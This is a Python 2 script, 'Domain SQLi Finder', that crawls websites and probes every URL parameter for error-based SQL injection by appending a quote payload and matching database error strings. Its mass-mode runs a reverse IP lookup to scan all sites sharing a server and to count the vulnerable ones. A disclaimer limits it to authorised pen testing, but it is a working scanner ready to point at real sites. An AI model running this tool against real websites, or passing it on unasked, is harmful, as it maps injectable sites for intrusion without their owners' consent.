- #!/usr/local/bin/python2.7
- # This was written for a Penetration Test assessment and is for educational purposes only. Use it at your own risk.
- # The author is not responsible for any damage!
- # Intended for authorized Web Application Pen Testing only!
- import chilkat, sys, os, argparse, httplib, urlparse, urllib2, re, time, datetime
- import DomainReverseIPLookUp
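- # Note: DomainReverseIPLookUp is a companion helper module (assumed to sit alongside this script); it is only used for the
- # Mass-Mode (--durl) reverse IP lookup and writes its results to the text file that this script later reads back in.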
- # The following variables get their values from command line args: either the user-supplied value or the default one
- pagesToCrawl = "" # Number of pages to crawl in a website
- maxVulInjectableParam = "" # Maximum number of vulnerable pages (parameters) to find
- output = "" # Output file name - append mode (a)
- reverseLookUp = "DSQLiReverseLookUp.txt" # Output file name for reverseIP lookup - write+ mode (w+)
- crawlDump = 'DSQLiCrawlerOutput.txt' # Stores crawling result for current crawl only - write+ mode (w+)
- uniqueLinksDump = 'DSQLiUniqueLinks.txt' # Stores crawling result for current scan only - write+ mode (w+)
- errorDump = 'DSQLiErrorDump.txt' # Dumps handled errors - append mode (a)
- sitesToScan = "" # Stores maximum number of sites to scan on domain in case of Mass-Mode Attack
- maxVulSites = "" # Stores maximum number of vulnerable sites to find with Mass-Mode Attack
- reverseFlag = 0 # Determines whether reverseLookUp file is generated by script or user supplies it
- maxVulSitesFlag = 0 # Keeps track of how many vulnerable sites have been found in Mass-Mode Attack
- verbose = 0 # Determines what messages to display on screen (0 or 1)
- sqlPayload = ["1'"] # SQL Payloads, add in more here
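- # Hypothetical additional payloads, if broader coverage is wanted: e.g. "1\"" or "1')" - anything that breaks the
- # quoting context and provokes a database error message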
- sqlErrors = [
- "Warning",
- "mysql_fetch_array()",
- "mysql_fetch_object()",
- "mysql_num_rows()",
- "mysql_free_result()",
- "mysql_real_escape_string()",
- "mysql_connect()",
- "mysql_select_db()",
- "mysql_query()",
- "You have an error in your SQL syntax",
- "Unclosed quotation mark after the character string",
- "Server Error in '/' Application",
- "Microsoft OLE DB Provider for ODBC Drivers error",
- "supplied argument is not a valid OCI8-Statement",
- "microsoft jet database engine"
- ] # add in more here
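- # Detection sketch (hypothetical target, illustrating how sqlPayload and sqlErrors are used below):
- #   request  -> http://example.com/page.php?id=1'
- #   response -> "...You have an error in your SQL syntax..."
- #   => the parameter is reported as error-based SQLi vulnerable because a string from sqlErrors appears in the page source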
- # Determine platform and clear screen
- def clear_screen():
- if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
- os.system('clear')
- elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
- os.system('cls')
- else:
- pass
- # Banner - prints the ASCII-art banner and basic usage
- def banner():
- print """
- ##################################################################
- Domain SQLi Finder - (Error Based Tool-v0.1)
- b0nd@garage4hackers.com
- Greetz to:
- (www.garage4hackers.com)
- GGGGGG\
- GG __GG\
- GG / \__| aaaaaa\ rrrrrr\ aaaaaa\ gggggg\ eeeeee\
- GG |GGGG\ \____aa\ rr __rr\ \____aa\ gg __gg\ ee __ee\
- GG |\_GG | aaaaaaa |rr | \__|aaaaaaa |gg / gg |eeeeeeee |
- GG | GG |aa __aa |rr | aa __aa |gg | gg |ee ____|
- \GGGGGG |\\aaaaaaa |rr | \\aaaaaaa |\ggggggg |\\eeeeeee\
- \______/ \_______|\__| \_______| \____gg | \_______|
- gg\ gg |
- gggggg |
- \______/
- Usage: python Domain-SQLi-Finder.py -h
- ###################################################################
- """
- print "\tUsage: python %s [options]" % sys.argv[0]
- print "\t\t-h help\n"
- call_exit()
- def call_exit():
- print "\n\tExiting ...........\n"
- sys.exit(0)
- # Tests SQLi on all unique links and parameters by appending sqlPayload and checking the source
- def check_SQLi(uniqueUrls):
- sqliUrls = [] # This list will contain sorted URLs ready to be appended with sqlPayloads
- flag = 0 # Variable to check whether desired 'n' number of vulnerable pages have been found
- for link in uniqueUrls: # This list has all unique URLs but since a single unique URL might have multiple parameters
- num = link.count("=") # so this loop prepares URLs with one parameter each
- if num > 0:
- for x in xrange(1, num + 1):
- url = link.rsplit("=",x)[0]+"="
- sqliUrls.append(url)
- sqliUrls = list(set(sqliUrls)) # By now this list has all injectable parameters ready to append sqlPayload
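- # Illustration (hypothetical link): "http://example.com/page.php?id=1&cat=2" has two '=' signs, so
- #   link.rsplit("=",1)[0]+"=" -> "http://example.com/page.php?id=1&cat="
- #   link.rsplit("=",2)[0]+"=" -> "http://example.com/page.php?id="
- # i.e. every injectable parameter gets its own entry in sqliUrls, ready for a payload to be appended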
- parsed = urlparse.urlparse(link) # Later used to obtain website name
- now = datetime.datetime.now() # Current time of scanning to put in DSQLiResults output file
- try:
- fd_output = open(output, 'a')
- fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" + (now.strftime("%Y-%m-%d %H:%M")) + ")\n") # Writing URL base name to output file
- except IOError:
- print "\n\t[!] Error - could not open|write file %s \n" % output
- if verbose == 1:
- print "\n[*] Testing SQLi on following URLs:"
- for link in sqliUrls:
- print "\t[-] URL: ", link
- else:
- print "\n[*] Testing SQLi on URL's ....."
- # In the following loop the flag counter is what limits the scan to 'n' vulnerable pages. If only a limited number of pages
- # has to be found, flag determines whether that many have been found yet; once the limit is reached, all loops are broken.
- # If the links in sqliUrls run out before the limit is reached, control falls out of the loops naturally. With the default (0),
- # i.e. find all vulnerable pages, flag does nothing beyond counting how many were found.
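- # Example: with --pages 2 the nested loops stop right after the second vulnerable parameter is found;
- # with the default --pages 0, every link in sqliUrls is tested and flag simply ends up as the total count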
- for link in sqliUrls:
- for pload in sqlPayload:
- if verbose == 1:
- print "\n\n\tTesting: %s\n" % (link+pload)
- try:
- source = urllib2.urlopen(link+pload).read() # Appending sqlPayload and reading source for errors
- except urllib2.HTTPError, err:
- if err.code == 500:
- if verbose == 1:
- print "\t\t[!] Error - HTTP Error 500: Internal Server Error"
- print "\t\t[-] Continuing with next link"
- continue
- else:
- if verbose == 1:
- print "\t\t[!] Error - HTTP Error xxx"
- print "\t\t[-] Continuing with next link"
- continue
- for errors in sqlErrors:
- if re.search(re.escape(errors), source) != None: # If any SQL error string appears in the source (escaped, since some strings contain regex metacharacters)
- fd_output.write("\t\t[!] BINGO!!! SQLi Vulnerable " + link+pload + "\n")
- print "\n\t\t[!] BINGO!!! - SQLi FOUND in: %s (%s) \n" % (link+pload, errors)
- if maxVulInjectableParam != 0: # i.e. if 'n' number of vulnerable parameters have to be found
- if flag < maxVulInjectableParam:
- flag = flag + 1
- else:
- break
- else: # i.e if all vulnerable pages have to be found
- flag = flag + 1
- break
- else:
- if verbose == 1:
- print "\t\t[-] Not Vulnerable - String (%s) not found in response" % errors
- else:
- pass
- if maxVulInjectableParam != 0 and flag == maxVulInjectableParam: # i.e. if 'n' pages have already been found
- break
- if maxVulInjectableParam != 0 and flag == maxVulInjectableParam: # i.e. if 'n' pages have already been found
- break
- if flag != 0:
- print "\n\t[-] Target is vulnerable to SQLi, check log file"
- print "\t\t[-] %d injectable vulnerable parameters found" % (flag)
- global maxVulSitesFlag
- maxVulSitesFlag = maxVulSitesFlag + 1 # Increment the flag which determines how many vulnerable sites to find in case of Mass-Mode Attack
- else:
- print "\n\t[-] Target is not vulnerable to SQLi"
- try:
- fd_output.write("\t\tTarget is not vulnerable to SQLi attack\n")
- fd_output.close() # Close the file on completion of each URL, so that log file could be seen for
- except IOError: # result instantly, instead of waiting for whole script to finish
- print "\n\t[!] Error - file I/O error\n"
- try:
- fd_output.close()
- except IOError:
- pass
- # Just finds the unique URLs from all crawled URLs and saves to list
- # Concept: parse the URL, find its injectable parameter(s), and check the combination of [netloc, path, injectable parameters] against the combinations
- # found so far; if it is unique, add the URL to uniqueUrls, otherwise move on to the next URL and parse it the same way
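- # Example (hypothetical): "page.php?id=1&cat=5" and "page.php?id=9&cat=2" share the combination [netloc, path, ['id', 'cat']],
- # so only the first one is kept; "page.php?id=1&lang=en" has a different parameter set and is therefore kept as well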
- def unique_urls(unsortedUrls):
- print "\n[*] Finding unique URL's ....."
- list_db = [] # Used as temporary storage to compare parameters with already found ones
- uniqueUrls = [] # This one will finally have unique URLs in it
- for link in unsortedUrls:
- list_tmp = [] # Temporary list to store query parameters only
- try:
- parsed = urlparse.urlparse(link)
- num = parsed.query.count("=") # Just checking the parsed.query portion for number of injectable parameters it has
- for x in xrange(num):
- list_tmp.append(parsed.query.split("&")[x].rsplit("=",1)[0]) # list_tmp ends up holding every injectable parameter name as an element
- except IndexError:
- # Some links raise this error because they embed an external URL, which adds extra "=" characters to the link;
- # the loop then runs one extra time and raises an index-out-of-range error
- if verbose == 1:
- print "\n\t[!] Error - list index out of range - check %s and report to author" % (errorDump)
- try:
- fd_errorDump = open(errorDump, 'a')
- fd_errorDump.write("\n\t[*] Error occurred inside unique_urls function for:\t" + parsed.query)
- except IOError:
- print "\n\t[!] Error - could not open|write file %s \n" % errorDump
- continue
- list_tmp = [parsed.netloc, parsed.path, list_tmp]
- if list_tmp in list_db: # For the first URL, this condition would definitely fail as list_db is empty
- continue # i.e. same parameters but with different values have been found, so continue
- else:
- list_db.append(list_tmp) # Update the found unique parameters
- uniqueUrls.append(link) # Update the List with unique complete URLs
- if verbose == 1:
- for link in uniqueUrls:
- print "\t[-] Unique link found: ", link
- try:
- fd_uniqueLinkDump = open(uniqueLinksDump, 'a')
- for link in uniqueUrls:
- fd_uniqueLinkDump.write(link + '\n')
- fd_uniqueLinkDump.close()
- except IOError:
- print "\n\t[!] Error - could not open|write file %s \n" % uniqueLinksDump
- check_SQLi(uniqueUrls) # Call SQLi check function to test SQLi vulnerability
- # Function crawls to find "pagesToCrawl" number of pages from the URL.
- # It stops when the limit is reached or there are no more pages left to crawl, whichever comes first
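- # Example: with --crawl 100 at most 100 pages are requested; verbose mode prints each crawled URL (plus a progress
- # line every 50 pages), while non-verbose mode just prints a dot per page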
- def crawl_site(url):
- print "[*] Attacking URL -> ", url
- print "\t[*] Crawling %s to find injectable parameters" % url
- spider = chilkat.CkSpider() # Using Chilkat Library. Some modules are free.
- spider.Initialize(url)
- spider.AddUnspidered(url)
- spider.CrawlNext()
- print "\n\t[-] Website Title: ", spider.lastHtmlTitle()
- print "\n\t[-] Crawling Pages", # The trailing comma to show progress bar in case of non-verbose
- crawlerOutput = [] # This list will hold up to pagesToCrawl pages of the URL
- for i in range(0,int(pagesToCrawl)):
- success = spider.CrawlNext()
- if (success == True):
- if verbose == 1:
- if i%50 == 0:
- print "\n[-] %d percent of %d pages to crawl complete\n" % ((i*100)/pagesToCrawl, pagesToCrawl)
- print "\t", spider.lastUrl()
- else:
- sys.stdout.flush()
- print ".", # In non verbose case, it prints dot dot dot to show the progress
- crawlerOutput.append(spider.lastUrl())
- else:
- if (spider.get_NumUnspidered() == 0):
- print "\n\t[-] No more URLs to spider"
- i = i - 1 # Need to decrement, else gives +1 count for total pages crawled
- break
- else:
- print spider.lastErrorText()
- continue
- spider.SleepMs(10)
- try:
- fd_crawlDump = open(crawlDump, 'a') # Logs
- for link in crawlerOutput:
- fd_crawlDump.write(link + '\n')
- fd_crawlDump.close()
- except IOError:
- print "\n\t[!] Error - could not open|write file %s \n" % crawlDump
- print "\n\t[-] Crawled %d pages successfully" % (i+1)
- if verbose == 1:
- print "\n[*] Parsing URL's to collect links with '=' in them ....."
- urlsWithParameters = [] # This list would have only those URLs which has '=' in them i.e. injectable parameter(s)
- for link in crawlerOutput:
- if link.count("=") > 0:
- urlsWithParameters.append(link)
- if urlsWithParameters != []:
- if verbose == 1:
- print "\t[-] Done"
- unique_urls(urlsWithParameters) # Time to find unique URLs among all with '=' in them
- else:
- print "\n\t[!] No injectable parameter found"
- now = datetime.datetime.now() # Current time to put in DSQLiResults output file
- try:
- parsed = urlparse.urlparse(url)
- fd_output = open(output, 'a')
- fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" + (now.strftime("%Y-%m-%d %H:%M")) + ")\n") # Writing URL base name to output file
- fd_output.write("\t\tNo injectable parameter found\n")
- fd_output.close()
- except IOError:
- print "\n\t[!] Error - could not open|write file %s \n" % output
- # Function tries to find SQLi on sites on shared hosting
- def attack_Domain(durl):
- sites = []
- counter = 0 # This keeps check on how many sites have been scanned so far
- deadLinks = 0 # This keeps check on how many dead links have been found
- print "\n[*] Attacking Domain -> ", durl
- if reverseFlag == 0: # i.e. if --reverse switch is not used on console. That means, do reverseIP Lookup and generate result
- DomainReverseIPLookUp.generate_reverse_lookup(durl, reverseLookUp, verbose) # pass domain url, output file name and verbose level
- try:
- fd_reverseLookUp = open(reverseLookUp, 'r')
- for url in fd_reverseLookUp.readlines():
- sites.append(url) # List sites contains all the domains hosted on server
- except IOError:
- print "\n\t[!] Error - %s file missing" % reverseLookUp
- print "\t[-] Generate it using --reverse switch or get domains from some reverse IP lookup website"
- call_exit()
- elif reverseFlag == 1: # i.e. if --reverse switch is mentioned, then don't do reverse IP Lookup and read data from already generated file
- try:
- fd_reverseLookUp = open(reverseLookUp, 'r')
- for url in fd_reverseLookUp.readlines():
- sites.append(url) # List sites contains all the domains hosted on server
- except IOError:
- print "\n\t[!] Error - %s file missing" % reverseLookUp
- print "\t[-] Generate it using --reverse switch or get domains from some reverse IP lookup website"
- call_exit()
- if sitesToScan != 0: # i.e. if not all sites are to be scanned, trim the list to the requested number
- sites = sites[0:sitesToScan]
- for site in sites:
- try:
- print "\n\t#################################################"
- print "\n\t [-] Number of alive sites scanned so far: ", counter
- print "\n\t [-] Number of vulnerable sites found so far: ", maxVulSitesFlag
- print "\n\t [-] Number of dead sites found so far: ", deadLinks
- print "\n\t#################################################\n"
- if maxVulSites != 0: # i.e. if not all vulnerable sites are to be found
- if maxVulSitesFlag == maxVulSites:
- print "\n\t[-] Stopping scan - the required number of vulnerable sites have been found"
- break
- site = site.strip() # remove the trailing '\n' left by readlines()
- if site[:7] != "http://": # prepend http:// to url, if not already done by user
- site = "http://" + site # what about https sites?
- print "-"*80
- print "\n[*] Target URL - %s ....." % (site) # Verify URL for its existance
- if verify_URL(site) == True: # Function call to verify URL for existance
- print "\t[-] URL Verified\n"
- crawl_site(site) # Pass the site to crawl function
- else:
- print "\n\t[-] URL %s could not be verified, continuing with next target in list" % site
- deadLinks = deadLinks + 1
- continue
- except KeyboardInterrupt:
- decision = raw_input("\n\t[?] how do you want to proceed? [(C)ontinue with next target in list or (q)uit]: ")
- if decision == 'C' or decision == 'c':
- continue
- elif decision == 'q':
- print "\n[!] Error - user aborted"
- call_exit()
- else:
- print "\n\tEnjoy: oo=========> (|)"
- call_exit()
- counter = counter + 1 # Counting for only those sites which really got scanned
- # for those whose URLs couldn't be verified, not incrementing counter
- print "\n\n[*] Scanning Finished"
- print "\n\t[-] Total Number of vulnerable sites found in domain: ", maxVulSitesFlag
- print "\t[-] Check log file %s for result" % output
- # Function to verify URL is alive and accessible
- def verify_URL(url):
- good_codes = [httplib.OK, httplib.FOUND, httplib.MOVED_PERMANENTLY] # 200, 302, 301 respectively
- host, path = urlparse.urlparse(url)[1:3] # elems [1] and [2] - netloc and path
- try:
- conn = httplib.HTTPConnection(host)
- conn.request('HEAD', path)
- status = conn.getresponse().status
- conn.close()
- except StandardError:
- status = None
- return status in good_codes # Either 'True' or 'False'
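- # Usage sketch (hypothetical hosts):
- #   verify_URL("http://example.com/index.php") -> True if the HEAD request returns 200, 301 or 302
- #   verify_URL("http://dead.example.invalid/") -> False (connection failure leaves status as None)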
- # Parse command line arguments, allowed combinations and mandatory values
- def parseArgs():
- parser = argparse.ArgumentParser(description = 'Domain SQLi Finder - Error Based Tool v0.1', epilog="Report bugs to b0nd@garage4hackers.com | www.garage4hackers.com")
- parser.add_argument('--verbose', nargs='?', dest='verbose', default=0, help='set verbosity [0 (default) : Off | 1 : On]', type=int)
- parser.add_argument('--output', metavar='output.txt', dest='siteOutput', default='DSQLiResults.txt', help='output file to store results in (default=DSQLiResults.txt)')
- group1 = parser.add_argument_group('Single-Mode Attack: Target One Site on Domain')
- group1.add_argument('--url', nargs=1, dest='URL', help='target site to find SQLi')
- group1.add_argument('--crawl', nargs='?', dest='crawl', default=500, help='number of pages to crawl (default=500)', type=int)
- group1.add_argument('--pages', nargs='?', dest='pages', default=0, help='number of vulnerable pages (injectable parameters) to find in site (default=0 i.e. all)', type=int)
- # Note: group1 and group2 share the same dests "crawl" and "pages", so whether --crawl or --dcrawl is used on the console,
- # the same variable is updated (and ultimately the global pagesToCrawl). The same goes for "pages"
- group2 = parser.add_argument_group('Mass-Mode Attack: Target All Sites on Domain')
- group2.add_argument('--durl', nargs=1, dest='DURL', help='target domain to find SQLi')
- group2.add_argument('--sites', nargs='?', dest='sites', default=0, type=int, help='number of sites to scan on domain (default=0 i.e. all)')
- group2.add_argument('--vulsites', nargs='?', dest='vulsites', default=0, type=int, help='number of vulnerable sites to find on domain (default=0 i.e. all possible)')
- group2.add_argument('--dcrawl', nargs='?', dest='crawl', default=500, type=int, help='number of pages to crawl in each site (default=500)')
- group2.add_argument('--dpages', nargs='?', dest='pages', default=0, type=int, help='number of vulnerable pages (injectable parameters) to find in each site (default=0 i.e. all)')
- group2.add_argument('--reverse', metavar='output.txt', nargs=1, dest='reverseLookUp', help='output file to store found sites on server and|or read Reverse IP Lookup results from file')
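- # Example invocations (hypothetical targets):
- #   python Domain-SQLi-Finder.py --url http://example.com --crawl 200 --pages 2 --verbose 1
- #   python Domain-SQLi-Finder.py --durl http://example.com --vulsites 2 --dcrawl 100 --reverse reverse.txt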
- args = parser.parse_args()
- # Check exclusiveness of options
- if (args.URL != None and args.DURL != None):
- print "\n\t[!] Error - Mutually exclusive options (--url, --durl)"
- call_exit()
- # Check existence of at least one option
- if (args.URL == None and args.DURL == None):
- print "\n\t[!] Error - No mode selected (--url, --durl)"
- call_exit()
- # Check that a value was passed to each arg; e.g. --crawl without a value would set it to "None" and the program would crash
- # All of these switches have default values, so the user either leaves them off the command line or must supply a value
- if (args.crawl == None or args.pages == None or args.sites == None or args.vulsites == None):
- print "\n\t[!] Error - Insufficient number of value(s) passed to argument(s)"
- call_exit()
- # Sanity checks: --vulsites must not exceed --sites, and --(d)pages must not exceed --(d)crawl
- if args.sites < args.vulsites:
- print "\n\t[!] Error - kidding? --sites shall be > --vulsites\n"
- call_exit()
- elif args.crawl < args.pages:
- print "\n\t[!] Error - kidding? --(d)crawl shall be > --(d)pages\n"
- call_exit()
- # Check if switch --reverse is used with --durl only
- if ((args.URL != None) and (args.reverseLookUp != None)):
- print "\n\t[!] Error - '--reverse' switch goes with Mass-Mode (--durl) attack only"
- call_exit()
- global reverseLookUp # Declaring it here as it's used a couple of times in this function
- # Check verbosity (--verbose argument)
- if args.verbose != None: # It would be none only when mentioned without any value i.e. --verbose <no value>
- if args.verbose == 1: # and if that is the case, the global value of verbose is 0 already, so - verbose off
- print "\n[*] Verbose Mode On"
- global verbose # verbose global variable
- verbose = 1
- if args.URL != None: # Verbose mode for --url
- print "\t[-] Pages to crawl (default=500): ", (args.crawl)
- print "\t[-] Vulnerable injectable parameters (pages) to find in site (default=0 i.e. all): %d" % (args.pages)
- print "\t[-] Output file name: %s" % (args.siteOutput)
- if args.DURL != None: # Verbose mode for --durl
- print "\t[-] Number of sites to scan on domain (default=0 i.e all): ", (args.sites)
- print "\t[-] Number of vulnerable sites to find on domain (default=0 i.e. all possible): ", (args.vulsites)
- print "\t[-] Pages to crawl in each site (default=500): ", (args.crawl)
- print "\t[-] Vulnerable injectable parameters (pages) to find in each site (default=0 i.e. all): %d" % (args.pages)
- if args.reverseLookUp != None: # i.e. if on console the reverse.txt file names is mentioned
- print "\t[-] Reverse IP Look-up file needed to read domains from: %s" % (args.reverseLookUp[0])
- else:
- print "\t[-] Reverse IP Look-up output file: %s" % reverseLookUp
- print "\t[-] Final result output file: %s" % (args.siteOutput)
- else: # i.e. if value 0 is passed to --verbose
- print "\n[*] Verbose Mode Off"
- else: # i.e. verbose has None Value, it's been passed without value
- print "\n[*] Vebose Mode Off (by default)"
- # By this point either the --url or the --durl switch is enabled
- # The following assignments cover both --url and --durl - only the relevant ones could be kept, with the rest moved under "if args.DURL != None"
- # This is fine with the current "common" crawl and pages parameters; assigning them separately for --url and --durl would first
- # require defining separate "dcrawl" and "dpages" dests for use with --durl
- global pagesToCrawl
- pagesToCrawl = args.crawl
- global maxVulInjectableParam
- maxVulInjectableParam = args.pages
- global output
- output = args.siteOutput
- global sitesToScan
- sitesToScan = args.sites
- global maxVulSites
- maxVulSites = args.vulsites
- # Single-Mode Attack (--url argument)
- if args.URL != None:
- if args.URL[0][:7] != "http://": # prepend http:// to url, if not already done by user
- args.URL[0] = "http://"+args.URL[0] # what about https site?
- print "\n[*] Verifying URL....." # Verify URL for its existance
- if verify_URL(args.URL[0]) == True: # Function call to verify URL for existance
- print "\t[-] URL Verified\n"
- crawl_site(args.URL[0]) # Goto the function which deals with 1 URL
- else:
- print "\n\t[-] URL cound not be verified."
- call_exit()
- # Mass-Mode Attack (--durl argument)
- elif args.DURL != None:
- if args.DURL[0][:7] != "http://":
- args.DURL[0] = "http://"+args.DURL[0]
- # reverseLookUp has no default value, so if it is not given on the console it will be None. If it is not None, the user wants to read an
- # already-generated reverse look-up file, produced either by this code or copied from elsewhere. In that case the input file must reside in the same directory
- if args.reverseLookUp != None:
- reverseLookUp = args.reverseLookUp[0]
- global reverseFlag # Determines whether reverseLookUp file is generated by script or user supplies it
- reverseFlag = 1
- attack_Domain(args.DURL[0])
- else: # i.e. --reverse is not mentioned on command prompt. Our code shall generate one.
- print "\n[*] Verifying Domain - %s ....." % (args.DURL[0])
- if verify_URL(args.DURL[0]) == True:
- print "\t[-] Domain Verified\n"
- attack_Domain(args.DURL[0])
- else:
- print "\n\t[-] Domain cound not be verified."
- call_exit()
- def main():
- #clear_screen()
- if len(sys.argv) < 2:
- banner()
- parseArgs() # Parse command line arguments
- call_exit()
- # ---------------------------------------- Code execution starts here ------------------------
- main()